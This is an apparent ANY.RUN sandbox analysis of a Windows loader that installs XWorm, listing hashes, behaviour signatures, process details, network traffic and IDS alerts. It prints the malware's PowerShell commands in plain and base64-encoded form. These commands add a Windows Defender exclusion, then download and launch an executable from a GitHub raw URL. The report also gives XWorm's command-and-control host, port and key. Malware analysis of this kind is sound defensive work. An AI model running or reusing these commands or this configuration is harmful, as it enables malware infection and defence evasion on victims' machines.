File name:

2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_

Full analysis: https://app.any.run/tasks/03e48658-74fc-4be7-afdd-c2fbb7f47fdd
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 21, 2025, 14:52:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
github
loader
xworm
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 18 sections
MD5:

227A6B8301E50DC44FC8B0C2ED551FC1

SHA1:

9B6E8C18EDA5D3EFCC90C304B5916708BAE53034

SHA256:

0F4B478C31ABC26C075BB35FA7D327AEFE1EAB58505C07ADB4D73F942B7B866C

SSDEEP:

12288:RUfnjsJnnn5wesEvSBpnIZcQmMsaQ66l66LWkeJ++h:RUfnQHwbEvSBWZc/aQ66l66Cjh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • powershell.exe (PID: 6260)
    • Changes Windows Defender settings

      • powershell.exe (PID: 6260)
    • XWORM has been detected (YARA)

      • test1.exe (PID: 6852)
  • SUSPICIOUS

    • Working with threads in the GNU C Compiler (GCC) libraries related mutex has been found

      • 2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exe (PID: 6612)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3564)
      • powershell.exe (PID: 6260)
    • Starts CMD.EXE for commands execution

      • 2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exe (PID: 6612)
    • Starts process via Powershell

      • powershell.exe (PID: 1604)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3564)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1604)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 3564)
    • Script adds exclusion path to Windows Defender

      • powershell.exe (PID: 6260)
    • Application launched itself

      • powershell.exe (PID: 6260)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1604)
    • Connects to unusual port

      • test1.exe (PID: 6852)
  • INFO

    • Checks supported languages

      • 2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exe (PID: 6612)
      • test1.exe (PID: 6852)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 1604)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1604)
    • Disables trace logs

      • powershell.exe (PID: 1604)
    • Checks proxy server information

      • powershell.exe (PID: 1604)
      • slui.exe (PID: 5600)
    • The executable file from the user directory is run by the Powershell process

      • test1.exe (PID: 6852)
    • Reads the computer name

      • test1.exe (PID: 6852)
    • Reads the machine GUID from the registry

      • test1.exe (PID: 6852)
    • Reads the software policy settings

      • slui.exe (PID: 5600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(6852) test1.exe
C2127.0.0.1,district-graphical.gl.at.ply.gg:33678
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time5
USB drop nameXWorm V5.6
MutexCe6cDZ9WTiheCS5d
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.2)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:06:18 19:39:35+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, Large address aware
PEType: PE32+
LinkerVersion: 2.24
CodeSize: 461312
InitializedDataSize: 680960
UninitializedDataSize: 6144
EntryPoint: 0x1500
OSVersion: 4
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
9
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs #XWORM test1.exe svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1604"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming'; Invoke-WebRequest -Uri 'https://github.com/KaisarYetiandi/test/raw/refs/heads/main/test1.exe' -OutFile 'C:\Users\admin\AppData\Roaming\test1.exe'; Start-Process 'C:\Users\admin\AppData\Roaming\test1.exe'" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2200C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3564C:\WINDOWS\system32\cmd.exe /c powershell -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAtAEMAbwBtAG0AYQBuAGQAIABgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAJwA7ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBLAGEAaQBzAGEAcgBZAGUAdABpAGEAbgBkAGkALwB0AGUAcwB0AC8AcgBhAHcALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAHQAZQBzAHQAMQAuAGUAeABlACcAIAAtAE8AdQB0AEYAaQBsAGUAIAAnACQAZQBuAHYAOgBBAHAAcABEAGEAdABhAFwAdABlAHMAdAAxAC4AZQB4AGUAJwA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAXAB0AGUAcwB0ADEALgBlAHgAZQAnAGAAIgAiAA0ACgA=C:\Windows\System32\cmd.exe2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
4748\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5600C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6260powershell -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAtAEMAbwBtAG0AYQBuAGQAIABgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAJwA7ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBLAGEAaQBzAGEAcgBZAGUAdABpAGEAbgBkAGkALwB0AGUAcwB0AC8AcgBhAHcALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAHQAZQBzAHQAMQAuAGUAeABlACcAIAAtAE8AdQB0AEYAaQBsAGUAIAAnACQAZQBuAHYAOgBBAHAAcABEAGEAdABhAFwAdABlAHMAdAAxAC4AZQB4AGUAJwA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAXAB0AGUAcwB0ADEALgBlAHgAZQAnAGAAIgAiAA0ACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
6612"C:\Users\admin\Desktop\2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exe" C:\Users\admin\Desktop\2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\2025-06-21_227a6b8301e50dc44fc8b0c2ed551fc1_.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
6852"C:\Users\admin\AppData\Roaming\test1.exe" C:\Users\admin\AppData\Roaming\test1.exe
powershell.exe
User:
admin
Integrity Level:
HIGH
Description:
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\test1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
XWorm
(PID) Process(6852) test1.exe
C2127.0.0.1,district-graphical.gl.at.ply.gg:33678
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time5
USB drop nameXWorm V5.6
MutexCe6cDZ9WTiheCS5d
6868\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 900
Read events
14 900
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
4
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
6260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3vqvlmkb.qrz.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1604powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF177d4e.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
6260powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:F7A468483B0CFD34A7843D4658AC1EE0
SHA256:FB0E32007C2686C9BCE6DBDB81BA94E855F6E85AE39F2D26485FD66A00E210CB
6260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s1atealo.vxn.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1604powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4posaoex.gwu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1604powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:D2137E8053009BB01626B24B280C8D13
SHA256:94EC1EF98170296948F1A0BF375BF3E0BBCC302E832E36D2191A11FAD94311E5
1604powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OJ1P3FV8O0KERTUXWV3Q.tempbinary
MD5:D2137E8053009BB01626B24B280C8D13
SHA256:94EC1EF98170296948F1A0BF375BF3E0BBCC302E832E36D2191A11FAD94311E5
1604powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zod2go3j.ymb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1604powershell.exeC:\Users\admin\AppData\Roaming\test1.exeexecutable
MD5:7450647C903FBD4AC7E9E06B736A9C28
SHA256:BB3790DB9F92181BEAFA0EB3740898081291FCB7D60D7DBD2288E197BC153CF9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
25
DNS requests
11
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
302
140.82.121.3:443
https://github.com/KaisarYetiandi/test/raw/refs/heads/main/test1.exe
unknown
GET
200
140.82.121.3:443
https://raw.githubusercontent.com/KaisarYetiandi/test/refs/heads/main/test1.exe
unknown
executable
32.5 Kb
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
23.55.104.172:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4868
RUXIMICS.exe
GET
200
23.55.104.172:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4868
RUXIMICS.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4868
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1604
powershell.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
5944
MoUsoCoreWorker.exe
23.55.104.172:80
crl.microsoft.com
Akamai International B.V.
US
whitelisted
4868
RUXIMICS.exe
23.55.104.172:80
crl.microsoft.com
Akamai International B.V.
US
whitelisted
5944
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.46
whitelisted
github.com
  • 140.82.121.4
whitelisted
crl.microsoft.com
  • 23.55.104.172
  • 23.55.104.190
whitelisted
www.microsoft.com
  • 2.23.246.101
whitelisted
raw.githubusercontent.com
  • 185.199.109.133
  • 185.199.108.133
  • 185.199.110.133
  • 185.199.111.133
whitelisted
district-graphical.gl.at.ply.gg
  • 147.185.221.28
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
self.events.data.microsoft.com
  • 20.189.173.7
whitelisted

Threats

PID
Process
Class
Message
2200
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Misc activity
ET HUNTING EXE Downloaded from Github
2200
svchost.exe
A Network Trojan was detected
MALWARE [ANY.RUN] Suspected domain Associated with Malware Distribution (.ply .gg)
2200
svchost.exe
Misc activity
ET TA_ABUSED_SERVICES Tunneling Service in DNS Lookup (* .ply .gg)
2200
svchost.exe
Potentially Bad Traffic
ET INFO playit .gg Tunneling Domain in DNS Lookup
No debug info